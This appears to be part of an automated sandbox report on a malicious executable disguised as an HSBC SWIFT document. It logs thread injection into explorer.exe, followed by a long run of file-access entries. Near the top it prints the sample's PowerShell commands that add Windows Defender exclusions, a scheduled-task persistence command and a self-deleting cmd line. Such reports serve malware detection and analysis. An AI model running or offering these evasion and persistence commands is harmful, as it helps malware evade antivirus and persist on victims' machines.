          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exe
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RdffGefdbLSx.exeJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RdffGefdbLSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4EB8.tmpJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeProcess created: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe"
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.412974599.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.408000852.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.433341392.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.396953851.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000003.535032917.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000003.538546418.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.608113159.0000000004E70000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.607889638.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.543133001.0000000004C4E000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.543696150.0000000004E70000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmpBinary or memory string: Program Manager (Not Responding)
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455383928.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.423622107.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.385587747.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.405655661.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.538571440.0000000000BAB000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.608113159.0000000004E70000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000000.538393765.0000000000B27000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.602763202.0000000000B27000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.603102128.0000000000BAB000.00000004.00000020.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.543696150.0000000004E70000.00000004.00000001.sdmpBinary or memory string: Progman
          Source: msdt.exe, 00000014.00000002.625333622.0000000003A30000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.603883171.0000000001380000.00000002.00020000.sdmpBinary or memory string: |Program Manager
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 0000000A.00000000.424397974.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.455796698.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.386683012.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.406067987.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 0000001C.00000000.539241055.0000000001380000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
